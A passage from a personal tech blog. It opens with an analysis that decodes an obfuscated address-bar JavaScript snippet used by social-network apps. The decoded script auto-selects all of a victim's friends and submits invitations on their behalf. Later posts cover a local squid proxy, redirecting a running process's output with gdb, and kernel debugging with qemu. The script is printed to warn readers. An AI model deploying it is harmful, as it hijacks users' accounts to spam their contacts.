"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
d=document;
d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];
d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];
s=d[_0x95ea[2]](_0x95ea[6]);
m=d[_0x95ea[2]](_0x95ea[7]);
c=d[_0x95ea[9]](_0x95ea[8]);
c[_0x95ea[11]](_0x95ea[10],true,true);
s[_0x95ea[12]](c);
setTimeout(function(){fs[_0x95ea[13]]()},5000);
setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);
setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

note that executing print(_0x95ea); gives

visibility,style,getElementById,hidden,innerHTML,value,suggest,likeme,MouseEvents,createEvent,click,initEvent,dispatchEvent,select_all,sgm_invite_form,/ajax/social_graph/invite_dialog.php,submitDialog

so, the final code that gets executed is

document["getElementById"]("app120196878004524_mwrapper")["style"]["visibility"]="hidden";
document["getElementById"]("app120196878004524_jop")["innerHTML"]=document["getElementById"]("app120196878004524_jode")["value"];
s=document["getElementById"]("suggest");
m=document["getElementById"]("likeme");
c=document["createEvent"]("MouseEvents");
c["initEvent"]("click",true,true);
s["dispatchEvent"](c);
setTimeout(function(){fs["select_all"]()},5000);
setTimeout(function(){SocialGraphManager["submitDialog"]("sgm_invite_form","/ajax/social_graph/invite_dialog.php")},5000);
setTimeout(function(){m["dispatchEvent"](c);document["getElementById"]("app120196878004524_ifo")["innerHTML"]=document["getElementById"]("app120196878004524_ifc")["value"]},5000);

Essentially the script automatically brings up `suggest to friends' window listing all friends, selects all and submits the invitation request on your behalf (using MouseEvents with setTimeout).

Note that the code template is same for all these kind of applications. Just the application specific IDs ("app120196878004524_jop" etc.) change.

In general, whenever someone asks you to execute some piece of javascript in address bar, consider it harmful. In this case they do not steal your identity, so no worries; but you have every reason to believe the next such application will.

Take care.

Wednesday, May 05, 2010

Authenticated corporate proxy woes - Local squid cache peer proxy

How many times has it happened at school or work that the software you want to use needs to connect to the Internet can not get through the stupid proxy? I know I've suffered a lot due to this. Moreover, looks like companies such as Nokia, Ubisoft etc. do not really care about people behind authenticated proxies either. It is really surprising (and annoying) to see so many nice software without support for authenticated proxies. That also includes the all new `awesome' (sarcasm intended) chat client that comes by default in Ubuntu called Empathy.

Or are you otherwise pissed off because you have to type your proxy authentication in all those different places? There are KDE settings, GNOME settings, (e)links, subversion config, yum/apt configuration, entering password a thousand times when firefox(pre-3.6) tries to find updates after restart and reopen all those tabs etc. etc., or IE settings for windows users, the "netsh winhttp set proxy" method to get your Windows 7 updates through the proxy?

Yes. Very, very annoying.

What if you could delegate the authentication to some other service running on and strictly for your computer only? How about your own proxy server running on your machine that delegates requests to your organization's proxy with proper authentication so that you no longer have to worry about authentication?

Running local squid

The basic idea is this : we run a local instance of squid which runs as a peer proxy to the organization's proxy, with authentication on your behalf. This means that now you can set proxy as localhost and connect - the authentication will be taken care of by local squid copy. Not just that, it also reduces some load on your organization's proxy, as it also caches (static by default) content.

Just append these lines to your /etc/squid/squid.conf

cache_peer proxy.addr parent [proxy.addr proxy port] [proxy.addr icp port]  
default no-query login=[login_name]:[pass]

# to bypass the proxy for local or LAN access
acl local_domain dstdomain *.local.domain
acl local_nat dst 10.0.0.0/8
always_direct allow local_domain
always_direct allow local_nat

# everything else must pass through the parent. No direct access allowed.
never_direct allow all

Let us dissect the config:
  • cache_peer proxy.addr tells squid to work as a peer proxy to your organization's proxy. 
  • parent tells squid that proxy.addr is one of it's parents in the cache hierarchy.
  • [my.proxy.address proxy port] the port on which organization's proxy accepts connections.
  • [my.proxy.address icp port] the port on which organization's proxy listens for ICP requests.
Now the `option'
  • no-query in case your proxy does not provide ICP support, or you do not want to enable it, providing this clause will stop our squid from sending ICP requests and reduce unnecessary delays. 
  • login=[login_name]:[pass] self explanatory.

Note that you need to take care of forwarding any special ports your applications might need.

This method works only for basic authentication (base64 encode method).

There are some obvious security concerns. First, your password is stored in plaintext - make sure that non-root users have *no* permissions on /etc/squid/squid.conf. Also make sure that this proxy accepts connections only from local host. There still is a security hole, in that in case someone logs into your machine as a normal or guest user, even he can use your connection.

This method works on all UNIces, Linux as well as Windows.

Wednesday, April 14, 2010

Continue running a non nohup-ed command after logout (no SIGHUP)

Many times it happens that you start a command that takes fairly long time to complete, and before it ends, you must log out for some reason - maybe the network will go down soon or you do not want to keep staring at the screen till it completes, or you just don't want to keep that terminal around.

A bit of shell behaviour for the uninformed. When you launch a command in a shell, the new process is created by fork()ing the current shell and immediately exec()ing the command executable/binary, which means the new process is a child of the shell process. You can stop the running process and keep it running in background as

% java some.long.running.application
{java program spits out something}
{hit ^z}
^Z
zsh: suspended  java some.long.running.application
% bg
[1]  + continued  java some.long.running.application

or you can start it in background as

% java some.long.running.application &
[1]  1001
{java program spits out something}

of course you can bring these jobs in foreground any time you want

% jobs
[1]  - running    iostat -xd 100
[2]  + running    java some.long.running.application
[3]  + suspended  ~/bin/startOfflineIMAP.sh
% fg %2 {bash users must drop the %}
[2]    running    java some.long.running.application
{java program spits out something}

Now you want to log out. The moment you log out of the terminal, the shell process sends SIGHUP signal to all running children and SIGCONT->SIGHUP for all stopped children. The default behaviour of an application after receiving SIGHUP is to exit. Any applications - foreground, as well as background, that were started from this shell are killed. We want our application to survive after logout.

The textbook way of doing this is to start the command with `nohup' as

% nohup java some.long.running.application &
[1] 1001
% logout

or the subshell trick :

% (java some.long.running.application &)
% {prompt returns, java disowned}
{java program spits out something}

zsh users can do it as :

% java some.long.running.application &!
% {prompt returns, java disowned}
{java program spits out something}

Or use the good old screen (my favorite)!

Unfortunately you did not start the process with nohup or subshell trick, and say the process can not be restarted because of some reason or it has done significant work already.

What if we could tell the shell not to send SIGHUP to a particular child?
`disown' command lets you do just that! :D

% jobs
[1]  - running    iostat -xd 100
[2]  + running    java some.long.running.application
[3]  + suspended  ~/bin/startOfflineIMAP.sh
% disown %2 {bash users must drop the %, also bashers can add -h option}
{java program spits out something}

This tells the shell not to send SIGHUP to our precious java process. And you'd think you can now happily log out with java process still running.

Well, not quite. Say the shell has pid 1000 and java process has pid 1001, then

% ls -l /proc/1000/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1
lrwx------. {...} 1 -> /dev/pts/1
lrwx------. {...} 2 -> /dev/pts/1

% ls -l /proc/1001/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1
lrwx------. {...} 1 -> /dev/pts/1
lrwx------. {...} 2 -> /dev/pts/1


Which means process 1001 uses terminal /dev/pts/1 as it's stdin, stdout and stderr. Even if we disown the java process, when the shell quits, terminal device /dev/pts/1 will not be available, and hence next read or write by java process to any of stdin/stdout/stderr will probably result in an abort. Even if it does not abort, you might want to capture stdout and stderr of the program somewhere to a file maybe, and possibly feed some file to it as input. That is not possible as

% ls -l /proc/1000/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1 (deleted)
lrwx------. {...} 1 -> /dev/pts/1 (deleted)
lrwx------. {...} 2 -> /dev/pts/1 (deleted)

Sad, isn't it?

Not quite!

Let us analyze how nohup works. If output of nohup is not redirected to some file, by default all the output of nohup-ed program goes to some default file (such as $HOME/nohup.out or $PWD/nohup.out). In any case, nohup has a writeable file descriptor to the file where output is supposed to go. Immediately after fork() but before exec(), nohup duplicates this fd to stdout and stderr using dup2(). This way, the child can keep running after being released from the shell without SIGHUP (which means it's parent=1), as stdout and stderr fds are still valid because they no longer are the fds of parent shell but fds of some real file opened. Stdin is probably uncared for as we are running the process in background, non-interactive mode after all.

The question is : all this is fine as it is done _before_ starting the java process. What can we do to change it's stdout and stderr _after_ it has been launched already?
Note that we can not modify /proc/1001/fd/1 to link to some real file (me wonders what issues would creep up if it was allowed).

Our good old friend gdb comes to rescue! The solution is trivial. Just attach the process, open a file you want the output to go to within that program with open() and dup2() the new fd to 1 and 2 :D

% gdb -p 1001
....
Attaching to process 1001
Reading symbols from /usr/bin/java...(no debugging symbols found)...done.
...
(gdb) call open("/home/prashant/tmp/output", O_WRONLY | O_CREAT | O_APPEND)
$1 = 5
(gdb) call dup2(5,1)
$2 = 1
(gdb) call open("/home/prashant/tmp/output.err", O_WRONLY | O_CREAT | O_APPEND)
$1 = 6
(gdb) call dup2(6,2)
$3 = 2
(gdb) detach 
Detaching from program: /usr/bin/java, process 1001
(gdb) quit
%

In case debug info is not available, you can replace the O_ macros to actual values in fcntl.h

...
(gdb) call dup2(open("/home/prashant/tmp/output", 0x209),1)
$2 = 1
(gdb) call dup2(open("/home/prashant/tmp/output.err", 0x209),2)
$3 = 2
(gdb) detach
...

Note that you can redirect stdin and stdout in same file if you wish (just be careful with append mode on NFS and truncate mode in general ;).

And that's about it. Go ahead and logout. Your process should be busy while you are gone.

PS : this will work as long as the program does not try to read anything from stdin. If and when it does, it may crash depending on whether the program abort()s when it can not do basic IO on fds 0,1 and 2. You might want to open another file to read and use dup2() in similar way if you plan to provide input from a file.

Monday, March 29, 2010

Debugging kernel with qemu and gdb

Assuming that you have your (or Linux/*BSD/Solaris/Windows or any other) kernel on a bootable device, you can debug the kernel and also the loadable modules as well as user mode applications with QEmu/Bochs and good old gdb.
  • Configuring QEmu
You need qemu compiled with gdb support. QEmu needs no configuration file as such, and can be launched with gdb support as:
qemu -hda hd.img -fda floppy.img -boot ac -m 512M -S -gdb tcp::5022
 After this, qemu will continue executing the VM, and wait for a gdbmi connection on tcp 5022.
  • Configuring bochs
bochs is one of the most popular emulators in the hobbyist x86 kernel developers' world. Again, you need bochs which was configured and compiled with gdb stub. Some distributions like Fedora have a separate package for bochs with gdb stub, in case you do not want to go through the trouble of compiling it yourself.

Bochs needs a configuration file for launching a VM. Assuming you know the basic syntax, go ahead and add the following :
gdbstub: enabled=1, port=5022, text_base=0, data_base=0, bss_base=0
adjust the segment bases according to the bases of your segments. If you are following a flat memory model, pin them to 0.
After starting with this config, bochs will wait for a gdb connection even before the first instruction in BIOS trampoline is executed. This way you can debug a bootloader, and also your custom bios!
  • GDB
Obviously you need to compile what you plan to debug (be it kernel, user libs, user apps) with good amount of debug support. -g3 with gcc is my default. Not to mention, do not strip the binaries.

Start up gdb.

This tells gdb to read debug info from kernel image 'krnl/kernel'.
file krnl/kernel

This tells gdb to connect with a gdbmi connection to tcp 5022, the port on which either qemu or bochs is already waiting.
target remote localhost:5022

In order to debug user mode apps,
add-symbol-file apps/testApp1.elf 0x04000000

There you go. Now you can pretty much debug the entire system so as to say. Almost all common gdb commands like breakpoint, watchpoint, assembly debugging etc. work without sweat. If your fingers hurt, put all these commands in a file named '.gdbinit' in your project directory. gdb will pick it up and load and connect automatically.

This can save gazillions of man hours of a hobby kernel developer. Believe me, printk debugging is no fun. Source level kernel debugging when you are writing IDT handling code is must. When writing interrupt handler and paging, I have wasted two weekends in pleasing company of triple faults, completely clueless.

For the sickle minded and the general wannabe h4x0r, you just got a (way more) powerful alternative to rootkits. Rev those dongles and drivers. Let your imagination run wild ;)